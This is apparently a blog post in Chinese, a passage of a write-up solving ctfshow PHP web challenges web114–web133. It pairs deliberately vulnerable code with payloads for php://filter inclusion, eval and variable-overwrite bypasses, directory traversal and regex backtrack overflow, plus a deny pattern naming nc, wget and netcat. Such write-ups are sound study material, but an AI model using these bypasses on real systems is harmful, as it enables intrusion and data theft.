{"id":296,"date":"2022-10-08T22:50:21","date_gmt":"2022-10-08T14:50:21","guid":{"rendered":"http:\/\/162.14.82.114\/?p=296"},"modified":"2022-10-08T22:50:21","modified_gmt":"2022-10-08T14:50:21","slug":"web%e5%85%a5%e9%97%a8-php%e7%89%b9%e6%80%a7%e4%ba%8c","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/296\/10\/08\/2022\/","title":{"rendered":"WEB\u5165\u95e8\u2014\u2014PHP\u7279\u6027(\u4e8c)"},"content":{"rendered":"<h1>web114<\/h1>\n<pre><code class=\"language-php\">&lt;?php\nerror_reporting(0);\nhighlight_file(__FILE__);\nfunction filter($file){\n    if(preg_match(&#039;\/compress|root|zip|convert|\\.\\.\\\/|http|https|data|data|rot13|base64|string\/i&#039;,$file)){\n        die(&#039;hacker!&#039;);\n    }else{\n        return $file;\n    }\n}\n$file=$_GET[&#039;file&#039;];\necho &quot;\u5e08\u5085\u4eec\u5c45\u7136tql\u90fd\u662f\u975e\u9884\u671f \u54fc\uff01&quot;;\nif(! is_file($file)){\n    highlight_file(filter($file));\n}else{\n    echo &quot;hacker!&quot;;\n} \u5e08\u5085\u4eec\u5c45\u7136tql\u90fd\u662f\u975e\u9884\u671f \u54fc\uff01<\/code><\/pre>\n<p>\u770b\u4e00\u4e0b\u4e0a\u4e00\u9898\u7684\u4f2a\u534f\u8bae\uff0c\u53d1\u73b0zip\u5df2\u7ecf\u88ab\u8fc7\u6ee4\u6389\u4e86\uff0c\u4f46\u5bf9\u6bd4\u53ef\u4ee5\u770b\u5230<code>filter<\/code>\u6ca1\u6709\u88ab\u8fc7\u6ee4\u6389\uff0c\u76f4\u63a5\u8fdb\u884c\u4f2a\u534f\u8bae\u5305\u542b\uff1a<\/p>\n<pre><code class=\"language-php\">\/?file=php:\/\/filter\/resource=flag.php<\/code><\/pre>\n<p>\u5f97\u5230flag\u3002\u3002<\/p>\n<h2>Hint<\/h2>\n<pre><code class=\"language-php\">payload: php:\/\/filter\/resource=flag.php<\/code><\/pre>\n<h1>web115<\/h1>\n<pre><code class=\"language-php\">&lt;?php\ninclude(&#039;flag.php&#039;);\nhighlight_file(__FILE__);\nerror_reporting(0);\nfunction filter($num){\n    $num=str_replace(&quot;0x&quot;,&quot;1&quot;,$num);\n    $num=str_replace(&quot;0&quot;,&quot;1&quot;,$num);\n    $num=str_replace(&quot;.&quot;,&quot;1&quot;,$num);\n    $num=str_replace(&quot;e&quot;,&quot;1&quot;,$num);\n    $num=str_replace(&quot;+&quot;,&quot;1&quot;,$num);\n    return $num;\n}\n$num=$_GET[&#039;num&#039;];\nif(is_numeric($num) and $num!==&#039;36&#039; and trim($num)!==&#039;36&#039; and filter($num)==&#039;36&#039;){\n    if($num==&#039;36&#039;){\n        echo $flag;\n    }else{\n        echo &quot;hacker!!&quot;;\n    }\n}else{\n    echo &quot;hacker!!!&quot;;\n} hacker!!!<\/code><\/pre>\n<p>\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u51fd\u6570\uff1a<\/p>\n<blockquote>\n<p>trim() \u51fd\u6570\u79fb\u9664\u5b57\u7b26\u4e32\u4e24\u4fa7\u7684\u7a7a\u767d\u5b57\u7b26\u6216\u5176\u4ed6\u9884\u5b9a\u4e49\u5b57\u7b26\u3002<\/p>\n<p>\u76f8\u5173\u51fd\u6570\uff1a<\/p>\n<ul>\n<li><a href=\"https:\/\/www.runoob.com\/php\/func-string-ltrim.html\">ltrim()<\/a> - \u79fb\u9664\u5b57\u7b26\u4e32\u5de6\u4fa7\u7684\u7a7a\u767d\u5b57\u7b26\u6216\u5176\u4ed6\u9884\u5b9a\u4e49\u5b57\u7b26\u3002<\/li>\n<li><a href=\"https:\/\/www.runoob.com\/php\/func-string-rtrim.html\">rtrim()<\/a> - \u79fb\u9664\u5b57\u7b26\u4e32\u53f3\u4fa7\u7684\u7a7a\u767d\u5b57\u7b26\u6216\u5176\u4ed6\u9884\u5b9a\u4e49\u5b57\u7b26\u3002<\/li>\n<\/ul>\n<p><code>trim(string,charlist)<\/code><\/p>\n<ul>\n<li><code>string<\/code>      \u5fc5\u9700\u3002\u89c4\u5b9a\u8981\u68c0\u67e5\u7684\u5b57\u7b26\u4e32\u3002<\/li>\n<li><code>charlist<\/code>     \u53ef\u9009\u3002\u89c4\u5b9a\u4ece\u5b57\u7b26\u4e32\u4e2d\u5220\u9664\u54ea\u4e9b\u5b57\u7b26\u3002\u5982\u679c\u7701\u7565\u8be5\u53c2\u6570\uff0c\u5219\u79fb\u9664\u4e0b\u5217\u6240\u6709\u5b57\u7b26\uff1a\n<ul>\n<li><code> <\/code> (ASCII <code>32<\/code> (<code>0x20<\/code>))\uff0c\u666e\u901a\u7a7a\u683c\u7b26\u3002<\/li>\n<li><code>\\t<\/code> (ASCII <code>9<\/code> (<code>0x09<\/code>))\uff0c\u5236\u8868\u7b26\u3002<\/li>\n<li><code>\\n<\/code> (ASCII <code>10<\/code> (<code>0x0A<\/code>))\uff0c\u6362\u884c\u7b26\u3002<\/li>\n<li><code>\\r<\/code> (ASCII <code>13<\/code> (<code>0x0D<\/code>))\uff0c\u56de\u8f66\u7b26\u3002<\/li>\n<li><code>\\0<\/code> (ASCII <code>0<\/code> (<code>0x00<\/code>))\uff0c\u7a7a\u5b57\u8282\u7b26\u3002<\/li>\n<li><code>\\x0B<\/code> (ASCII <code>11<\/code> (<code>0x0B<\/code>))\uff0c\u5782\u76f4\u5236\u8868\u7b26\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/blockquote>\n<p>\u4ee3\u7801\u5ba1\u8ba1\u4e00\u4e0b\uff1a<\/p>\n<ul>\n<li>num\u662f\u6570\u5b57<\/li>\n<li>num\u4e0d\u662f36<\/li>\n<li>trim\u79fb\u9664\u4ee5\u540e\u4e0d\u4e3a36<\/li>\n<li>filter\u51fd\u6570\u5224\u65ad\u540e\u4e3a36<\/li>\n<\/ul>\n<p>\u6784\u9020payload\uff1a<\/p>\n<pre><code class=\"language-php\">\/?num=%0c36<\/code><\/pre>\n<h2>PS<\/h2>\n<p>\u8fd9\u91cc\u7684<code>!==<\/code>\u76f8\u5f53\u4e8e\u5f3a\u7b49\u7684\u53d6\u53cd\uff0c\u95ee\u53f7\u76f8\u5f53\u4e8e\u53d6\u4ee3\u6389\u4e86\u4e00\u4e2a\u7b49\u4e8e\u53f7<\/p>\n<h2>Hint<\/h2>\n<pre><code class=\"language-php\">payload:num?%0c36\n%0c==\\f<\/code><\/pre>\n<h1>web123<\/h1>\n<pre><code class=\"language-php\">&lt;?php\nerror_reporting(0);\nhighlight_file(__FILE__);\ninclude(&quot;flag.php&quot;);\n$a=$_SERVER[&#039;argv&#039;];\n$c=$_POST[&#039;fun&#039;];\nif(isset($_POST[&#039;CTF_SHOW&#039;])&amp;&amp;isset($_POST[&#039;CTF_SHOW.COM&#039;])&amp;&amp;!isset($_GET[&#039;fl0g&#039;])){\n    if(!preg_match(&quot;\/\\\\\\\\|\\\/|\\~|\\`|\\!|\\@|\\#|\\%|\\^|\\*|\\-|\\+|\\=|\\{|\\}|\\&quot;|\\&#039;|\\,|\\.|\\;|\\?\/&quot;, $c)&amp;&amp;$c&lt;=18){\n         eval(&quot;$c&quot;.&quot;;&quot;);  \n         if($fl0g===&quot;flag_give_me&quot;){\n             echo $flag;\n         }\n    }\n}\n?&gt;<\/code><\/pre>\n<p>\u8fd9\u91cc\u6d89\u53ca\u5230\u4e00\u70b9\u662f\u5728\u63d0\u4ea4POST\u53c2\u6570,\u5f53<code>PHP\u7248\u672c\u5c0f\u4e8e8<\/code>\u65f6\uff0c\u5982\u679c\u53c2\u6570\u4e2d\u51fa\u73b0\u4e2d\u62ec\u53f7<code>[<\/code>\uff0c\u4e2d\u62ec\u53f7\u4f1a\u88ab\u8f6c\u6362\u6210\u4e0b\u5212\u7ebf<code>_<\/code>\uff0c\u4f46\u662f\u4f1a\u51fa\u73b0\u8f6c\u6362\u9519\u8bef\u5bfc\u81f4\u63a5\u4e0b\u6765\u5982\u679c\u8be5\u53c2\u6570\u540d\u4e2d\u8fd8\u6709<code>\u975e\u6cd5\u5b57\u7b26<\/code>\u5e76\u4e0d\u4f1a\u7ee7\u7eed\u8f6c\u6362\u6210\u4e0b\u5212\u7ebf<code>_<\/code>\uff0c\u4e5f\u5c31\u662f\u8bf4\u5982\u679c\u4e2d\u62ec\u53f7<code>[<\/code>\u51fa\u73b0\u5728\u524d\u9762\uff0c\u90a3\u4e48\u4e2d\u62ec\u53f7<code>[<\/code>\u8fd8\u662f\u4f1a\u88ab\u8f6c\u6362\u6210\u4e0b\u5212\u7ebf<code>_<\/code>\uff0c\u4f46\u662f\u56e0\u4e3a\u51fa\u9519\u5bfc\u81f4\u63a5\u4e0b\u6765\u7684\u975e\u6cd5\u5b57\u7b26\u5e76\u4e0d\u4f1a\u88ab\u8f6c\u6362\u6210\u4e0b\u5212\u7ebf<code>_<\/code><\/p>\n<pre><code class=\"language-php\">CTF_SHOW=1&amp;CTF[SHOW.COM=2&amp;fun=echo $flag<\/code><\/pre>\n<p>\u5f97\u5230flag\u3002\u3002\u3002\u3002<\/p>\n<h2>\u5927\u5e08\u5085payload<\/h2>\n<pre><code class=\"language-php\">CTF_SHOW=1&amp;CTF[SHOW.COM=2&amp;fun=echo implode(get_defined_vars())<\/code><\/pre>\n<h2>Hint<\/h2>\n<pre><code class=\"language-php\">POST: CTF_SHOW=&amp;CTF[SHOW.COM=&amp;fun=echo $flag<\/code><\/pre>\n<h1>web125<\/h1>\n<pre><code class=\"language-php\">&lt;?php\nerror_reporting(0);\nhighlight_file(__FILE__);\ninclude(&quot;flag.php&quot;);\n$a=$_SERVER[&#039;argv&#039;];\n$c=$_POST[&#039;fun&#039;];\nif(isset($_POST[&#039;CTF_SHOW&#039;])&amp;&amp;isset($_POST[&#039;CTF_SHOW.COM&#039;])&amp;&amp;!isset($_GET[&#039;fl0g&#039;])){\n    if(!preg_match(&quot;\/\\\\\\\\|\\\/|\\~|\\`|\\!|\\@|\\#|\\%|\\^|\\*|\\-|\\+|\\=|\\{|\\}|\\&quot;|\\&#039;|\\,|\\.|\\;|\\?|flag|GLOBALS|echo|var_dump|print\/i&quot;, $c)&amp;&amp;$c&lt;=16){\n         eval(&quot;$c&quot;.&quot;;&quot;);\n         if($fl0g===&quot;flag_give_me&quot;){\n             echo $flag;\n         }\n    }\n}\n?&gt;<\/code><\/pre>\n<p><code>echo<\/code>\u88ab\u7981\u7528\u4e86\u3002\u3002\u3002\u4f7f\u7528\u5176\u4ed6\u6253\u5370\u53c2\u6570\u7684\u51fd\u6570<\/p>\n<pre><code class=\"language-php\">CTF_SHOW=&amp;CTF[SHOW.COM=&amp;fun=var_export(get_defined_vars())<\/code><\/pre>\n<h2>\u5927\u5e08\u5085\u89e3\u6cd5<\/h2>\n<pre><code class=\"language-php\">CTF_SHOW=1&amp;CTF[SHOW.COM=2&amp;fun=extract($_POST)&amp;fl0g=flag_give_me<\/code><\/pre>\n<h2>Hint<\/h2>\n<pre><code class=\"language-php\">GET:?1=flag.php POST:CTF_SHOW=&amp;CTF[SHOW.COM=&amp;fun=highlight_file($_GET[1])<\/code><\/pre>\n<h1>web126<\/h1>\n<pre><code class=\"language-php\">&lt;?php\nerror_reporting(0);\nhighlight_file(__FILE__);\ninclude(&quot;flag.php&quot;);\n$a=$_SERVER[&#039;argv&#039;];\n$c=$_POST[&#039;fun&#039;];\nif(isset($_POST[&#039;CTF_SHOW&#039;])&amp;&amp;isset($_POST[&#039;CTF_SHOW.COM&#039;])&amp;&amp;!isset($_GET[&#039;fl0g&#039;])){\n    if(!preg_match(&quot;\/\\\\\\\\|\\\/|\\~|\\`|\\!|\\@|\\#|\\%|\\^|\\*|\\-|\\+|\\=|\\{|\\}|\\&quot;|\\&#039;|\\,|\\.|\\;|\\?|flag|GLOBALS|echo|var_dump|print|g|i|f|c|o|d\/i&quot;, $c) &amp;&amp; strlen($c)&lt;=16){\n         eval(&quot;$c&quot;.&quot;;&quot;);  \n         if($fl0g===&quot;flag_give_me&quot;){\n             echo $flag;\n         }\n    }\n}<\/code><\/pre>\n<p>\u8ddf\u7740\u5927\u5e08\u5085\u7684\u601d\u8def\uff1a<\/p>\n<pre><code class=\"language-php\">GET:?a=1+fl0g=flag_give_me\nPOST:CTF_SHOW=&amp;CTF[SHOW.COM=&amp;fun=parse_str($a[1])<\/code><\/pre>\n<p>\u5927\u5e08\u5085yyds\uff01\uff01\uff01\uff01\uff01<\/p>\n<h2>Hint<\/h2>\n<pre><code class=\"language-php\">GET:?a=1+fl0g=flag_give_me\nPOST:CTF_SHOW=&amp;CTF[SHOW.COM=&amp;fun=parse_str($a[1])\nor\nGET:?$fl0g=flag_give_me\nPOST:CTF_SHOW=&amp;CTF[SHOW.COM=&amp;fun=assert($a[0])<\/code><\/pre>\n<h1>web127<\/h1>\n<pre><code class=\"language-php\">&lt;?php\nerror_reporting(0);\ninclude(&quot;flag.php&quot;);\nhighlight_file(__FILE__);\n$ctf_show = md5($flag);\n$url = $_SERVER[&#039;QUERY_STRING&#039;];\n\n\/\/\u7279\u6b8a\u5b57\u7b26\u68c0\u6d4b\nfunction waf($url){\n    if(preg_match(&#039;\/\\`|\\~|\\!|\\@|\\#|\\^|\\*|\\(|\\)|\\\\$|\\_|\\-|\\+|\\{|\\;|\\:|\\[|\\]|\\}|\\&#039;|\\&quot;|\\&lt;|\\,|\\&gt;|\\.|\\\\\\|\\\/\/&#039;, $url)){\n        return true;\n    }else{\n        return false;\n    }\n}\n\nif(waf($url)){\n    die(&quot;\u55ef\u54fc\uff1f&quot;);\n}else{\n    extract($_GET);\n}\n\nif($ctf_show===&#039;ilove36d&#039;){\n    echo $flag;\n}<\/code><\/pre>\n<p>\u6784\u9020payload:<\/p>\n<pre><code class=\"language-php\">\/?ctf_show=ilove36d<\/code><\/pre>\n<p>\u53d1\u73b0\u4e0b\u5212\u7ebf\u88ab\u8fc7\u6ee4\u4e86\uff0c\u770b\u4e00\u4e0b\u6ca1\u88ab\u8fc7\u6ee4\u7684\u5b57\u7b26\uff0c\u53d1\u73b0\u7a7a\u683c\u6ca1\u88ab\u8fc7\u6ee4\uff0c\u6545\uff1a<\/p>\n<pre><code class=\"language-php\">\/?ctf show=ilove36d<\/code><\/pre>\n<p>\u7f16\u7801\u7ed5\u8fc7\u4e5f\u884c\uff1a<\/p>\n<pre><code class=\"language-php\">\/?ctf%5fshow=ilove36d\n\/?ctf%20show=ilove36d\n.......<\/code><\/pre>\n<h2>Hint<\/h2>\n<pre><code class=\"language-php\">GET:?ctf show=ilove36d<\/code><\/pre>\n<h1>web128(\u9a9a)<\/h1>\n<pre><code class=\"language-php\">&lt;?php\nerror_reporting(0);\ninclude(&quot;flag.php&quot;);\nhighlight_file(__FILE__);\n\n$f1 = $_GET[&#039;f1&#039;];\n$f2 = $_GET[&#039;f2&#039;];\n\nif(check($f1)){\n    var_dump(call_user_func(call_user_func($f1,$f2)));\n}else{\n    echo &quot;\u55ef\u54fc\uff1f&quot;;\n}\n\nfunction check($str){\n    return !preg_match(&#039;\/[0-9]|[a-z]\/i&#039;, $str);\n} NULL<\/code><\/pre>\n<p><code>f1<\/code>\u8fc7\u6ee4\u6389\u4e86\u5b57\u6bcd\u6570\u5b57\uff0c\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u51fd\u6570\uff1a<\/p>\n<blockquote>\n<p>call_user_func \u2014 \u628a\u7b2c\u4e00\u4e2a\u53c2\u6570\u4f5c\u4e3a\u56de\u8c03\u51fd\u6570\u8c03\u7528<\/p>\n<p><strong>\u8bf4\u660e<\/strong><\/p>\n<p>call_user_func(<a href=\"https:\/\/www.php.net\/manual\/zh\/language.types.callable.php\">callable<\/a> <code>$callback<\/code>, <a href=\"https:\/\/www.php.net\/manual\/zh\/language.types.declarations.php#language.types.declarations.mixed\">mixed<\/a> <code>...$args<\/code>): <a href=\"https:\/\/www.php.net\/manual\/zh\/language.types.declarations.php#language.types.declarations.mixed\">mixed<\/a><\/p>\n<p>\u7b2c\u4e00\u4e2a\u53c2\u6570 <code>callback<\/code> \u662f\u88ab\u8c03\u7528\u7684\u56de\u8c03\u51fd\u6570\uff0c\u5176\u4f59\u53c2\u6570\u662f\u56de\u8c03\u51fd\u6570\u7684\u53c2\u6570\u3002<\/p>\n<p><strong>\u53c2\u6570<\/strong><\/p>\n<ul>\n<li>\n<p><code>callback<\/code><\/p>\n<p>\u5c06\u88ab\u8c03\u7528\u7684\u56de\u8c03\u51fd\u6570\uff08<a href=\"https:\/\/www.php.net\/manual\/zh\/language.types.callable.php\">callable<\/a>\uff09\u3002<\/p>\n<\/li>\n<li>\n<p><code>args<\/code><\/p>\n<p>0\u4e2a\u6216\u4ee5\u4e0a\u7684\u53c2\u6570\uff0c\u88ab\u4f20\u5165\u56de\u8c03\u51fd\u6570\u3002<strong>\u6ce8\u610f<\/strong>:\u8bf7\u6ce8\u610f\uff0c\u4f20\u5165<strong>call_user_func()<\/strong>\u7684\u53c2\u6570\u4e0d\u80fd\u4e3a\u5f15\u7528\u4f20\u9012\u3002<\/p>\n<\/li>\n<\/ul>\n<\/blockquote>\n<p>\u770b\u5927\u5e08\u5085\u89c6\u9891\u63d0\u5230\u8fd9\u91cc\u9700\u8981\u4f7f\u7528\u4e00\u4e2a\u51fd\u6570\u7684\u522b\u540d\uff0c\u8fd8\u662fphp\u91cc\u552f\u4e00\u6709\u522b\u540d\u7684\u51fd\u6570\u3002\u3002\u3002\u3002\u3002<\/p>\n<p><code>gettext<\/code>\u53c8\u540d<code>_<\/code>\u4f5c\u7528\u662f\u8fd4\u56de\u5b57\u7b26\u4e32<\/p>\n<pre><code class=\"language-php\">&lt;?php\n    echo  _(&quot;Good Morning&quot;);\n?&gt;<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4e00\u4e0b\u662f\u5426\u53ef\u4ee5RCE\uff1a<\/p>\n<pre><code class=\"language-php\">\/?f1=_&amp;f2=phpinfo<\/code><\/pre>\n<p>\u770b\u5230phpinfo\u88ab\u6253\u51fa\u6765\u4e86\uff0c\u8bf4\u660e\u53ef\u4ee5RCE\uff01\uff01\uff01<\/p>\n<p>\u8bf4\u660egettext\u8fd9\u4e2a\u6269\u5c55\u88ab\u6253\u5f00\u4e86\uff0c\u63a5\u4e0b\u6765\u6253\u5370\u4e00\u4e0b\u6ce8\u518c\u7684\u53d8\u91cf\u5373\u53ef\uff1a<\/p>\n<pre><code>\/?f1=_&amp;f2=get_defined_vars<\/code><\/pre>\n<p>\u5f97\u5230flag!!!!!<\/p>\n<h2>Hint<\/h2>\n<p><a href=\"https:\/\/www.cnblogs.com\/lost-1987\/articles\/3309693.html\">https:\/\/www.cnblogs.com\/lost-1987\/articles\/3309693.html<\/a> <a href=\"https:\/\/www.php.net\/manual\/zh\/book.gettext.php\">https:\/\/www.php.net\/manual\/zh\/book.gettext.php<\/a><\/p>\n<p>\u5c0f\u77e5\u8bc6\u70b9\uff1a _()\u662f\u4e00\u4e2a\u51fd\u6570<\/p>\n<p>_()==gettext() \u662fgettext()\u7684\u62d3\u5c55\u51fd\u6570\uff0c\u5f00\u542ftext\u6269\u5c55\u3002\u9700\u8981php\u6269\u5c55\u76ee\u5f55\u4e0b\u6709php_gettext.dll<\/p>\n<p>get_defined_vars()\u51fd\u6570<\/p>\n<p>get_defined_vars \u2014 \u8fd4\u56de\u7531\u6240\u6709\u5df2\u5b9a\u4e49\u53d8\u91cf\u6240\u7ec4\u6210\u7684\u6570\u7ec4 \u8fd9\u6837\u53ef\u4ee5\u83b7\u5f97 $flag<\/p>\n<p>payload: ?f1=_&amp;f2=get_defined_vars<\/p>\n<h1>web129<\/h1>\n<pre><code class=\"language-php\">&lt;?php\nerror_reporting(0);\nhighlight_file(__FILE__);\nif(isset($_GET[&#039;f&#039;])){\n    $f = $_GET[&#039;f&#039;];\n    if(stripos($f, &#039;ctfshow&#039;)&gt;0){\n        echo readfile($f);\n    }\n}<\/code><\/pre>\n<p>\u8981\u6c42\u5339\u914d\u5230ctfshow\u5b57\u7b26\u4e32\u4e14\u4e0d\u5728\u7b2c\u4e00\u4e2a\uff0c\u6784\u9020\u4e00\u4e2a\u865a\u62df\u76ee\u5f55\u5c31\u884c\u4e86\uff1a<\/p>\n<pre><code class=\"language-php\">\/?f=\/ctfshow\/..\/..\/..\/..\/..\/..\/var\/www\/html\/flag.php<\/code><\/pre>\n<h2>Hint<\/h2>\n<p>\u8003\u5bdf\uff1a \u76ee\u5f55\u7a7f\u8d8a<\/p>\n<p>stripos() \u51fd\u6570\u67e5\u627e\u5b57\u7b26\u4e32\u5728\u53e6\u4e00\u5b57\u7b26\u4e32\u4e2d\u7b2c\u4e00\u6b21\u51fa\u73b0\u7684\u4f4d\u7f6e\uff08\u4e0d\u533a\u5206\u5927\u5c0f\u5199\uff09 payload: \/ctfshow\/..\/..\/..\/..\/var\/www\/html\/flag.php \u67e5\u770b\u6e90\u4ee3\u7801\u83b7\u5f97 flag<\/p>\n<h1>web130<\/h1>\n<pre><code class=\"language-text\">very very very\uff08\u7701\u756525\u4e07\u4e2avery\uff09ctfshow<\/code><\/pre>\n<pre><code class=\"language-php\">&lt;?php\nerror_reporting(0);\nhighlight_file(__FILE__);\ninclude(&quot;flag.php&quot;);\nif(isset($_POST[&#039;f&#039;])){\n    $f = $_POST[&#039;f&#039;];\n\n    if(preg_match(&#039;\/.+?ctfshow\/is&#039;, $f)){\n        die(&#039;bye!&#039;);\n    }\n    if(stripos($f, &#039;ctfshow&#039;) === FALSE){\n        die(&#039;bye!!&#039;);\n    }\n\n    echo $flag;\n}<\/code><\/pre>\n<p>\u9700\u8981\u8fc7\u6b63\u5219\uff0c\u8981\u6c42\u5728ctfshow\u524d\u9762\u6709\u7279\u6b8a\u5b57\u7b26\u5c31die\uff0c\u7b2c\u4e8c\u4e2a\u662f\u5f3a\u76f8\u7b49\u76f4\u63a5\u6784\u9020payload\u5373\u53ef\uff1a<\/p>\n<pre><code>POST:f=ctfshow\u5728\u540e\u9762\u968f\u4fbf\u52a0\u5565\u90fd\u884c<\/code><\/pre>\n<h2>Hint<\/h2>\n<p>\u76f4\u63a5\u7ed5\u8fc7\u6b63\u5219\u8868\u8fbe\u5f0f\uff1a f=ctfshow<\/p>\n<h1>web131<\/h1>\n<pre><code class=\"language-php\">&lt;?php\nerror_reporting(0);\nhighlight_file(__FILE__);\ninclude(&quot;flag.php&quot;);\nif(isset($_POST[&#039;f&#039;])){\n    $f = (String)$_POST[&#039;f&#039;];\n\n    if(preg_match(&#039;\/.+?ctfshow\/is&#039;, $f)){\n        die(&#039;bye!&#039;);\n    }\n    if(stripos($f,&#039;36Dctfshow&#039;) === FALSE){\n        die(&#039;bye!!&#039;);\n    }\n    echo $flag;\n}<\/code><\/pre>\n<p><code>preg_match<\/code>\u7279\u6027\uff0c\u8d85\u8fc7\u4e00\u5b9a\u957f\u5ea6\u4e0d\u518d\u8fdb\u884c\u6b63\u5219\u5339\u914d\uff0c\u5f88\u591a\u5382\u5546\u7684waf\u90fd\u662f\u57fa\u4e8e\u6b64\u7684\uff0c\u4e00\u822c\u90fd\u662f<code>250000\u00d74<\/code>\u5de6\u53f3\uff0c\u53ef\u4ee5\u5229\u7528\u8fd9\u4e2a\u8fdb\u884c\u7ed5\u8fc7\u3002<\/p>\n<pre><code class=\"language-python\">print(&quot;f=&quot;+&quot;abcd&quot;*2500000+&quot;36Dctfshow&quot;,end=&quot;&quot;)<\/code><\/pre>\n<p>\u63d0\u4ea4\u5373\u53ef\uff0c\u63d2\u4ef6\u70b8\u4e86\uff0c\u518d\u6765\u4e00\u6b21\uff0c\u6211\u662f\u61a8\u61a8\uff0c\u4e0a\u9762\u591a\u6253\u4e86\u4e00\u4e2a0.\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-python\">print(&quot;f=&quot;+&quot;abcd&quot;*250000+&quot;36Dctfshow&quot;,end=&quot;&quot;)<\/code><\/pre>\n<p>\u5f97\u5230flag\uff01\uff01\uff01\uff01<\/p>\n<h2>Hint<\/h2>\n<p>\u8003\u5bdf\uff1a \u6b63\u5219\u8868\u8fbe\u5f0f\u662f\u6ea2\u51fa <a href=\"https:\/\/www.laruence.com\/2010\/06\/08\/1579.html\">https:\/\/www.laruence.com\/2010\/06\/08\/1579.html<\/a> \u5927\u6982\u610f\u601d\u5c31\u662f\u5728php\u4e2d\u6b63\u5219\u8868\u8fbe\u5f0f\u8fdb\u884c\u5339\u914d\u6709\u4e00\u5b9a\u7684\u9650\u5236\uff0c\u8d85\u8fc7\u9650\u5236\u76f4\u63a5\u8fd4\u56defalse<\/p>\n<pre><code class=\"language-php\">#payload:\n&lt;?php\necho str_repeat(&#039;very&#039;, &#039;250000&#039;).&#039;36Dctfshow&#039;;\n#post\u53d1\u9001\u8fc7\u53bb\u5c31OK<\/code><\/pre>\n<h1>web132<\/h1>\n<p>\u6253\u5f00\u662f\u4e00\u4e2a\u7f51\u7ad9\uff0c\u8bbf\u95ee\u4e00\u4e0b\u5e38\u7528\u76ee\u5f55\uff1a<\/p>\n<pre><code class=\"language-text\">index\uff0cadmin\uff0crobots.txt\u7b49\u3002\u3002\u3002<\/code><\/pre>\n<p>\u5148\u770b\u4e00\u4e0b\u541b\u5b50\u534f\u8bae\uff1a<\/p>\n<pre><code class=\"language-text\">Disallow: \/admin<\/code><\/pre>\n<p>\u67e5\u770b\u4e00\u4e0badmin\uff0c\u53d1\u73b0\u6e90\u7801\uff01\uff01\uff01<\/p>\n<pre><code class=\"language-php\">&lt;?php\n#error_reporting(0);\ninclude(&quot;flag.php&quot;);\nhighlight_file(__FILE__);\nif(isset($_GET[&#039;username&#039;]) &amp;&amp; isset($_GET[&#039;password&#039;]) &amp;&amp; isset($_GET[&#039;code&#039;])){\n    $username = (String)$_GET[&#039;username&#039;];\n    $password = (String)$_GET[&#039;password&#039;];\n    $code = (String)$_GET[&#039;code&#039;];\n\n    if($code === mt_rand(1,0x36D) &amp;&amp; $password === $flag || $username ===&quot;admin&quot;){\n\n        if($code == &#039;admin&#039;){\n            echo $flag;\n        }       \n    }\n}<\/code><\/pre>\n<p>\u770b\u4e0b\u8fd9\u4e2a\u5224\u65ad\u903b\u8f91\u3002\u3002\u3002\u3002\u6700\u540e\u4e00\u4e2a\u53ef\u63a7\uff0c\u4e3a\u771f\u4e14<code>code=flag<\/code>\u5219\u8f93\u51faflag\uff0c\u6ca1\u4e86\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-php\">\/admin\/?username=admin&amp;password=1&amp;code=admin<\/code><\/pre>\n<p>\u5f97\u5230flag!!!<\/p>\n<h2>Hint<\/h2>\n<p>\u8003\u5bdf\uff1a php\u4e2d&amp;&amp;\u548c||\u8fd0\u7b97\u7b26\u5e94\u7528 \u8bbf\u95ee\/robots.txt,\u4e4b\u540e\u8bbf\u95ee\/admin\uff0c\u83b7\u5f97\u6e90\u4ee3\u7801 <a href=\"https:\/\/www.cnblogs.com\/hurry-up\/p\/10220082.html\">https:\/\/www.cnblogs.com\/hurry-up\/p\/10220082.html<\/a> \u5bf9\u4e8e\u201c\u4e0e\u201d\uff08&amp;&amp;\uff09 \u8fd0\u7b97\uff1a x &amp;&amp; y \u5f53x\u4e3afalse\u65f6\uff0c\u76f4\u63a5\u8df3\u8fc7\uff0c\u4e0d\u6267\u884cy\uff1b \u5bf9\u4e8e\u201c\u6216\u201d\uff08||\uff09 \u8fd0\u7b97 \uff1a x||y \u5f53x\u4e3atrue\u65f6\uff0c\u76f4\u63a5\u8df3\u8fc7\uff0c\u4e0d\u6267\u884cy\u3002 payload: ?a=admin&amp;b=admin&amp;c=admin<\/p>\n<pre><code class=\"language-php\">#\u5728\u5224\u65ad\u8fd9\u4e2a\u7684\u65f6\u5019\nif($code === mt_rand(1,0x36D) &amp;&amp; $password === $flag || $username ===&quot;admin&quot;)\n\u7b2c\u4e00\u4e2a$code === mt_rand(1,0x36D)\u4e3afalse,\u4e4b\u540e\u5c31\u6267\u884c|| $username ===&quot;admin&quot;#\u6210\u529f\u7ed5\n\u8fc7<\/code><\/pre>\n<h1>web133(\u9a9a)<\/h1>\n<pre><code class=\"language-php\">&lt;?php\nerror_reporting(0);\nhighlight_file(__FILE__);\n\/\/flag.php\nif($F = @$_GET[&#039;F&#039;]){\n    if(!preg_match(&#039;\/system|nc|wget|exec|passthru|netcat\/i&#039;, $F)){\n        eval(substr($F,0,6));\n    }else{\n        die(&quot;6\u4e2a\u5b57\u6bcd\u90fd\u8fd8\u4e0d\u591f\u5440?!&quot;);\n    }\n}<\/code><\/pre>\n<p>\u6211\u5bf9\u8fd9\u91cc\u7684@$_GET\u4e0d\u662f\u5f88\u4e86\u89e3\u67e5\u5230\u4e86\u8fd9\u4e9b\u89e3\u91ca\uff1a<\/p>\n<blockquote>\n<p>@ \u7528\u4e8e\u9632\u6b62\u51fa\u73b0\u4efb\u4f55\u8b66\u544a\u6216\u9519\u8bef\u6d88\u606f\u3002<\/p>\n<p>@\u8868\u793a\u5ffd\u7565\u9519\u8bef\uff0c\u4f8b\u5982\u672a\u8bbe\u7f6e\u53d8\u91cf\u3002<\/p>\n<p>\u5c06\u505c\u6b62\u51fa\u73b0\u4efb\u4f55\u9519\u8bef\uff0c\u5e76\u5728\u9519\u8bef\u65f6\u8fd4\u56defalse\uff0c\u82e5\u53d8\u91cf\u4e0d\u5b58\u5728\uff0c\u5219\u4ee3\u7801\u5c06\u8fdb\u5165if\u8bed\u53e5  